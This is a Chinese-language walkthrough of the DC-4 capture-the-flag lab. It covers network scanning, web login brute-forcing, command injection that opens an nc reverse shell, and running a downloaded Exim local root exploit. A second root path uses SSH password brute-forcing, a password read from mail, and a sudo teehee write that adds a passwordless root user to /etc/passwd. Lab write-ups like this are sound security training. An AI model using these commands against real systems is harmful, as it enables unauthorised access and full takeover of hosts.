信息收集
arp-scan -l # 得知目标为192.168.150.213
nmap -T4 -p- -A 192.168.150.213 # 扫描全端口并显示所有能够识别的信息
扫到22、80
渗透
访问80是一个登录页面,使用bp抓包爆破,用户一般admin/Admin,密码字典用bp的(点击add from list,点击passwords)
爆出admin/happy,登录给了三个命令执行功能,先nc监听nc -lvvp 8000,再使用bp抓包,改redio参数为nc 192.168.150.213 8000 -e /bin/bash,放包,反弹成功
exim4提权
└─$ nc -lvvp 8000
listening on [any] 8000 ...
192.168.150.213: inverse host lookup failed: Unknown host
connect to [192.168.150.227] from (UNKNOWN) [192.168.150.213] 58252
ls
command.php
css
images
index.php
login.php
logout.php
pwd
/usr/share/nginx/html
find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
/bin/ping
/home/jim/test.sh
exim4 --version
Exim version 4.89 #2 built 10-Feb-2018 08:26:05
Copyright (c) University of Cambridge, 1995 - 2017
(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2017
Berkeley DB: Berkeley DB 5.3.28: (September 9, 2013)
Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event OCSP PRDR SOCKS TCP_Fast_Open
Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd
Authenticators: cram_md5 plaintext
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp
Fixed never_users: 0
Configure owner: 0:0
Size of off_t: 8
Configuration file is /var/lib/exim4/config.autogenerated
查找版本漏洞
└─$ searchsploit exim 4
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Dovecot with Exim - 'sender_address' Remote Command Execution | linux/remote/25297.txt
Exim - 'GHOST' glibc gethostbyname Buffer Overflow (Metasploit) | linux/remote/36421.rb
Exim - 'perl_startup' Local Privilege Escalation (Metasploit) | linux/local/39702.rb
Exim - 'sender_address' Remote Code Execution | linux/remote/25970.py
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation | linux/local/40054.c
Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow | linux/local/756.c
Exim 4.41 - 'dns_build_reverse' Local Read Emails | linux/local/1009.c
Exim 4.42 - Local Privilege Escalation | linux/local/796.sh
Exim 4.43 - 'auth_spa_server()' Remote | linux/remote/812.c
Exim 4.63 - Remote Command Execution | linux/remote/15725.pl
Exim 4.84-3 - Local Privilege Escalation | linux/local/39535.sh
Exim 4.87 - 4.91 - Local Privilege Escalation | linux/local/46996.sh
Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit) | linux/local/47307.rb
Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit) | linux/local/47307.rb
Exim 4.87 < 4.91 - (Local / Remote) Command Execution | linux/remote/46974.txt
Exim 4.89 - 'BDAT' Denial of Service | multiple/dos/43184.txt
exim 4.90 - Remote Code Execution | linux/remote/45671.py
Exim < 4.86.2 - Local Privilege Escalation | linux/local/39549.txt
Exim < 4.90.1 - 'base64d' Remote Code Execution | linux/remote/44571.py
Exim ESMTP 4.80 - glibc gethostbyname Denial of Service | linux/dos/35951.py
Exim Internet Mailer 3.35/3.36/4.10 - Format String | linux/local/22066.c
Exim Sender 3.35 - Verification Remote Stack Buffer Overrun | linux/remote/24093.c
Exim4 < 4.69 - string_format Function Heap Buffer Overflow (Metasploit) | linux/remote/16925.rb
MPlayer 0.9/1.0 - Remote HTTP Header Buffer Overflow | linux/dos/23896.txt
OpenBSD 3.3 - 'Semget()' Integer Overflow (1) | openbsd/local/23046.c
OpenBSD 3.3 - 'Semget()' Integer Overflow (2) | openbsd/local/23047.c
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution | php/webapps/42221.py
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
└─$ sudo find / -name 46996.sh
/usr/share/exploitdb/exploits/linux/local/46996.sh
└─$ systemctl start ap
apache-htcacheclean.service apache2.service apparmor.service apt-daily-upgrade.service apt-daily.service
└─$ systemctl start apache2.service
└─$ sudo cp /usr/share/exploitdb/exploits/linux/local/46996.sh /var/www/html/
将脚本下载到目标机器上
wget http://192.168.150.227/46996.sh
python -c "import pty;pty.spawn('/bin/bash')" # 这里看不到回显,使用python调一个交互shell
www-data@dc-4:/usr/share/nginx/html$ wget http://192.168.150.227/46996.sh
wget http://192.168.150.227/46996.sh
--2024-03-12 03:14:52-- http://192.168.150.227/46996.sh
Connecting to 192.168.150.227:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3552 (3.5K) [text/x-sh]
46996.sh: Permission denied
# 权限不够,换目录
Cannot write to '46996.sh' (Permission denied).
www-data@dc-4:/usr/share/nginx/html$ cd /tmp
cd /tmp
www-data@dc-4:/tmp$ wget http://192.168.150.227/46996.sh
wget http://192.168.150.227/46996.sh
--2024-03-12 03:15:21-- http://192.168.150.227/46996.sh
Connecting to 192.168.150.227:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3552 (3.5K) [text/x-sh]
Saving to: '46996.sh'
46996.sh 100%[===================>] 3.47K --.-KB/s in 0s
2024-03-12 03:15:21 (697 MB/s) - '46996.sh' saved [3552/3552]
www-data@dc-4:/tmp$ chmod +x 46996.sh
chmod +x 46996.sh
www-data@dc-4:/tmp$ ./46996.sh
raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
Preparing setuid shell helper...
Problems compiling setuid shell helper, check your gcc.
Falling back to the /bin/sh method.
Delivering setuid payload...
220 dc-4 ESMTP Exim 4.89 Tue, 12 Mar 2024 03:15:58 +1000
250 dc-4 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1rjjFm-0000DL-JB
221 dc-4 closing connection
Waiting 5 seconds...
-rwsr-xr-x 1 root www-data 124492 Mar 12 03:15 /tmp/pwned
# whoami
root # 拿到root权限
# cd /root
# ls
flag.txt
# cat flag.txt
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
#
teehee提权
寻找线索文件
└─$ nc -lvvp 8000
listening on [any] 8000 ...
192.168.150.213: inverse host lookup failed: Unknown host
connect to [192.168.150.227] from (UNKNOWN) [192.168.150.213] 55694
python -c "import pty;pty.spawn('/bin/bash')"
www-data@dc-4:~$ pwd
pwd
/var/www
www-data@dc-4:~$ cd ..
cd ..
www-data@dc-4:/var$ cd /home
cd /home
www-data@dc-4:/home$ ls
ls
charles jim sam
www-data@dc-4:/home$ cd jim
cd jim
www-data@dc-4:/home/jim$ ls
ls
backups mbox test.sh
www-data@dc-4:/home/jim$ cd backups
cd backups
www-data@dc-4:/home/jim/backups$ ls
ls
old-passwords.bak
www-data@dc-4:/home/jim/backups$ cat old-passwords.bak
cat old-passwords.bak
000000
12345
iloveyou
1q2w3e4r5t
1234
123456a
qwertyuiop
……
得到一些jim用户的旧密码
hydra爆破jim用户
└─$ vim jim.txt
┌──(kali㉿kali)-[~/Downloads]
└─$ hydra -l jim -P jim.txt 192.168.150.213 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-12 01:35:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://192.168.150.213:22/
[STATUS] 136.00 tries/min, 136 tries in 00:01h, 120 to do in 00:01h, 12 active
[STATUS] 98.00 tries/min, 196 tries in 00:02h, 60 to do in 00:01h, 12 active
[22][ssh] host: 192.168.150.213 login: jim password: jibril04
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-12 01:38:07
登录后提示有邮件
┌──(kali㉿kali)-[~/Downloads]
└─$ ssh jim@192.168.150.213
The authenticity of host '192.168.150.213 (192.168.150.213)' can't be established.
ED25519 key fingerprint is SHA256:0CH/AiSnfSSmNwRAHfnnLhx95MTRyszFXqzT03sUJkk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? y
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '192.168.150.213' (ED25519) to the list of known hosts.
jim@192.168.150.213's password:
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr 7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$ ls
backups mbox test.sh
jim@dc-4:~$ cd /var/spool/mail
jim@dc-4:/var/spool/mail$ ls
jim www-data
jim@dc-4:/var/spool/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O
Hi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is: ^xHhA&hvim0y
See ya,
Charles
jim@dc-4:/var/spool/mail$ su charles
Password:
charles@dc-4:/var/spool/mail$ ls
jim www-data
charles@dc-4:/var/spool/mail$ sudo -l
Matching Defaults entries for charles on dc-4:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on dc-4:
(root) NOPASSWD: /usr/bin/teehee
charles@dc-4:/var/spool/mail$ echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
admin::0:0:::/bin/bash
charles@dc-4:/var/spool/mail$ su admin
root@dc-4:/var/spool/mail# id
uid=0(root) gid=0(root) groups=0(root)
ps:
/etc/passwd 内每个字段含义
username:password:User ID:Group ID:comment:home directory:shell
最后是邮件中有charles的密码,使用su切换,sudo -l发现有teehee且没有密码,写入一条用户名为admin无密码且权限为0的用户,su admin即得root权限
2090
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
